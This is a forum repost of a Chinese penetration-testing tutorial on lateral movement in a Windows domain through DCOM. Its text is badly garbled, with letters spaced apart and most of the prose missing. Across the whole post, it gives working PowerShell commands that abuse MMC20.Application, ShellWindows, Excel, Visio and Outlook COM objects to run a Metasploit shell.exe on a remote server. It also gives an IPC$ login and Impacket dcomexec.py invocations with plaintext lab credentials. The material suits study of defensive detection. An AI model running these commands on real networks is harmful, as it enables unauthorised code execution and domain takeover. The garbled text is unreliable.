搜索

[22114] 2021-06-28_内网渗透测试:利用DCOM进行横向渗透

文档创建者:s7ckTeam
浏览次数:110
最后更新:2025-01-18
2021-06-28_内网渗透测试:利用DCOM进行横向渗透 D C O M f r e e b u f   L e m o n S e c   2 0 2 1 - 0 6 - 2 8 C O M C O M ( C o m p o n e n t   O b j e c t   M o d e l C O M )     W i n d o w s   C O M W i n d o w s W i n d o w s   S e r v e r 使 D C O M D C O M C O M 广 I n t e r n e t D C O M C O M 访 C O M D C O M   使 R P C C O M C O M D L L e x e R P C 使   D C O M     D C O M   O f f i c e     W i n d o w s   使 D C O M C O M S h e l l B r o w s e r W i n d o w   C O M e x p l o r e r . e x e D C O M
D C O M W i n d o w s   7 1 .   D C O M p o w e r s h e l l D C O M G e t - C i m I n s t a n c e   c m d l e p o w e r s h e l l p o w e r s h e l l   3 . 0 W i n d o w s   s e r v e r   2 0 1 2   使 G e t - C i m i n s t a n c e W i n d o w s   7 W i n d o w s   S e r v e r   2 0 0 8 p o w e r s h e l l   2 . 0 G e t - C i m I n s t a n c e G e t - C i m I n s t a n c e G e t - C i m I n s t a n c e   W i n 3 2 _ D C O M A p p l i c a t i o n G e t - W m i O b j e c t   - N a m e s p a c e   R O O T C I M V 2   - C l a s s   W i n 3 2 _ D C O M A p p l i c a t i o n
2 .   使 使 D C O M D C O M M M C   A p p l i c a t i o n   C l a s s M M C 2 0 . A p p l i c a t i o n C O M M M C p o w e r s h e l l P o w e r S h e l l D C O M M M C 2 0 . A p p l i c a t i o n D C O M P r o g I D I P C O M C O M C O M $ c o m   =   [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m P r o g I D ( " M M C 2 0 . A p p l i c a t i o n " , " 1 2 7 . 0 . 0 . 1 " ) ) #   " M M C 2 0 . A p p l i c a t i o n " $ c o m . D o c u m e n t . A c t i v e V i e w   |   G e t - M e m b e r
  E x e c u t e S h e l l C o m m a n d   E x e c u t e S h e l l C o m m a n d M M C 2 0 . A p p l i c a t i o n S h e l l W i n d o w s S h e l l B r o w s e r W i n d o w E x c e l . A p p l i c a t i o n O u t l o o k . A p p l i c a t i o n M M C 2 0 . A p p l i c a t i o n E x e c u t e S h e l l C o m m a n d I P 便 使     P o w e r s h e l l D C O M $ c o m . D o c u m e n t . A c t i v e V i e w . E x e c u t e S h e l l C o m m a n d ( ' c m d . e x e ' , $ n u l l , " / c   c a l c . e x e " , " M i n i m i z e d " )         / /   [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m P r o g I D ( P r o g I D , I P ) ) [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ T y p e ] : : G e t T y p e F r o m C L S I D ( C L S I D , I P ) )
D C O M   P r o g I D I P D C O M D C O M E x e c u t e S h e l l C o m m a n d p a y l o a d 使 D C O M 使 使 D C O M 使 D C O M 使 P o w e r S h e l l 使 a d m i n i s t r a t o r 1 M M C 2 0 . A p p l i c a t i o n g o d . o r g W i n d o w s   7 W i n d o w s   S e r v e r 2 0 0 8 D C W i n d o w s   S e r v e r   2 0 0 3 W i n d o w s   S e r v e r   2 0 0 8 1 9 2 . 1 6 8 . 5 2 . 1 3 8 O W A W i n d o w s 7 m e t e r p r e t e r W i n d o w s   7 I P 1 9 2 . 1 6 8 . 5 2 . 1 4 3 A m i n i s t r a t o r L i u 7 8 9 6 3 D C W i n d o w s   S e r v e r   2 0 0 8 I P 1 9 2 . 1 6 8 . 5 2 . 1 3 8 L i u k a i f e n g 0 1 L i u 7 8 9 6 3
1 .   W i n d o w s   7 i p c W i n d o w s   S e r v e r   2 0 0 8 2 .   W i n d o w s 7 m e t a s p l o i t s h e l l . e x e W i n d o w s 7 使 使 c o p y s h e l l . e x e W i n d o w s   S e r v e r   2 0 0 8 c i p c m s f 3 .   W i n d o w s 7 W i n d o w s   S e r v e r   2 0 0 8 W i n d o w s 7 m e t e r p r e t e r p o w e r s h e l l p o w e r s h e l l p o w e r s h e l l n e t   u s e   1 9 2 . 1 6 8 . 5 2 . 1 3 8 i p c $   " L i u 7 8 9 6 3 "   / u s e r : A m i n i s t r a t o r l o a d   p o w e r s h e l l p o w e r s h e l l _ s h e l l $ c o m   =   [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m P r o g I D ( " M M C 2 0 . A p p l i c a t i o n " , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) / /   P o w e r S h e l l D C O M D C O M   P r o g I D I P C O M / /   " E x e c u t e S h e l l C o m m a n d " $ c o m . D o c u m e n t . A c t i v e V i e w . E x e c u t e S h e l l C o m m a n d ( ' c m d . e x e ' , $ n u l l , " / c   C : s h e l l . e x e " , " M i n i m i z e d " )
W i n d o w s   S e r v e r   2 0 0 8 线 2 S h e l l W i n d o w s W i n d o w s   7 i p c W i n d o w s   S e r v e r   2 0 0 8 W i n d o w s 7 使 c o p y s h e l l . e x e W i n d o w s   S e r v e r   2 0 0 8 c W i n d o w s 7 p o w e r s h e l l W i n d o w s 7 W i n d o w s   S e r v e r   2 0 0 8 W i n d o w s   S e r v e r   2 0 0 8 c #   P o w e r S h e l l D C O M S h e l l W i n d o w s : $ c o m = [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ T y p e ] : : G e t T y p e F r o m C L S I D ( ' 9 B A 0 5 9 7 2 - F 6 A 8 - 1 1 C F - A 4 4 2 - 0 0 A 0 C 9 0 A 8 F 3 9 ' , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) #   " S h e l l E x e c u t e " : $ c o m . i t e m ( ) . D o c u m e n t . A p p l i c a t i o n . S h e l l E x e c u t e ( " c m d . e x e " , " / c   C : s h e l l . e x e " , " c : w i n d o w s s y s t e m 3 2 " , $ n u l l , 0 ) :
[ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ T y p e ] : : G e t T y p e F r o m C L S I D ( 9 B A 0 5 9 7 2 - F 6 A 8 - 1 1 C F - A 4 4 2 - 0 0 A 0 C 9 0 A 8 F 3 9 , 1 9 2 . 1 6 8 . 5 2 . 1 3 8 ) ) . i t e m ( ) . D o c u m e n t . A p p l i c a t i o n . S h e l l E x e c u t e ( c m d . e x e , / c C : s h e l l . e x e , c : w i n d o w s s y s t e m 3 2 , $ n u l l , 0 ) W i n d o w s   S e r v e r   2 0 0 8 线 W i n d o w s   7 ~ W i n d o w s   1 0 W i n d o w s   S e r v e r   2 0 0 8 ~ W i n d o w s   S e r v e r   2 0 1 6 i p c M M C 2 0 . A p p l i c a t i o n S h e l l W i n d o w s D C O M 3 E x c e l . A p p l i c a t i o n 使 4 S h e l l B r o w s e r W i n d o w 使 W i n d o w s   1 0 W i n d o w s   S e r v e r   2 0 1 2   R 2 使 5 V i s i o . A p p l i c a t i o n 使 V i s i o #   P o w e r S h e l l D C O M E x c e l . A p p l i c a t i o n : $ c o m   =   [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m p r o g I D ( " E x c e l . A p p l i c a t i o n " , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) $ c o m . D i s p l a y A l e r t s   =   $ f a l s e #   " D D E I n i t i a t e " : $ c o m . D D E I n i t i a t e ( " c m d . e x e " , " / c   C : s h e l l . e x e " ) #   P o w e r S h e l l D C O M E x c e l . A p p l i c a t i o n : $ c o m   =   [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m C L S I D ( " C 0 8 A F D 9 0 - F 2 A 1 - 1 1 D 1 - 8 4 5 5 - 0 0 A 0 C 9 1 F 3 8 8 0 " , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) #   " s h e l l E x e c u t e " : $ c o m . D o c u m e n t . A p p l i c a t i o n . s h e l l E x e c u t e ( " C : s h e l l . e x e " ) #   : [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m C L S I D ( " C 0 8 A F D 9 0 - F 2 A 1 - 1 1 D 1 - 8 4 5 5 - 0 0 A 0 C 9 1 F 3 8 8 0 " , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) . D o c u m e n t . A p p l i c a t i o n . s h e l l E x e c u t e ( " C : s h e l l . e x e " )
使 6 O u t l o o k . A p p l i c a t i o n 使 O u t l o o k O u t l o o k S h e l l . A p p l i c a t i o n I m p a c k e t d c o m e x e c . p y I m p a c k e t     d c o m e x e c . p y     w m i e x e c . p y   s h e l l 使 D C O M M M C 2 0 . A p p l i c a t i o n S h e l l W i n d o w s S h e l l B r o w s e r W i n d o w W i n d o w s   S e r v e r   2 0 1 2 使 d c o m e x e c . p y W i n d o w s   7 s h e l l W i n d o w s   S e r v e r   2 0 1 2 I P I P W i n d o w s   7 I P I P W i n d o w s   S e r v e r   2 0 1 2 W i n d o w s   S e r v e r   2 0 1 2 1 0 8 0 s o c k s p r o x y c h a i n s #   P o w e r S h e l l D C O M V i s i o . A p p l i c a t i o n : $ c o m   =   [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m P r o g I D ( " V i s i o . A p p l i c a t i o n " , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) #   " s h e l l E x e c u t e " : $ c o m . [ 0 ] . D o c u m e n t . A p p l i c a t i o n . s h e l l E x e c u t e ( " c a l c . e x e " ) #   : [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m P r o g I D ( " V i s i o . A p p l i c a t i o n " , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) . [ 0 ] . D o c u m e n t . A p p l i c a t i o n . s h e l l E x e c u t e ( " C : s h e l l . e x e " ) #   P o w e r S h e l l D C O M V i s i o . A p p l i c a t i o n : $ c o m   =   [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m P r o g I D ( " O u t l o o k . A p p l i c a t i o n " , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) #   O u t l o o k S h e l l . A p p l i c a t i o n : $ c o m . c r e a t e O b j e c t ( " S h e l l . A p p l i c a t i o n " ) . s h e l l E x e c u t e ( " C : s h e l l . e x e " ) #   : [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m P r o g I D ( " O u t l o o k . A p p l i c a t i o n " , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) . c r e a t e O b j e c t ( " S h e l l . A p p l i c a t i o n " ) . s h e l l E x e c u t e ( " C : s h e l l . e x e " ) . / d c o m e x e c . p y   d o m a i n / u s e r n a m e : p a s s w o r d @ i p . / d c o m e x e c . p y   d o m a i n / u s e r n a m e : p a s s w o r d @ i p   < c o m m a n d >
便 使 p r o x y c h a i n s d c o m e x e c . p y p r o x y c h a i n s 4   p y t h o n 3   . / d c o m e x e c . p y   g o d / a d m i n i s t r a t o r : L i u 7 8 9 6 3 @ 1 9 2 . 1 6 8 . 1 0 . 2 0     / /   s h e l l p r o x y c h a i n s 4   p y t h o n 3   . / d c o m e x e c . p y   g o d / a d m i n i s t r a t o r : L i u 7 8 9 6 3 @ 1 9 2 . 1 6 8 . 1 0 . 2 0   w h o a m i     / /  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理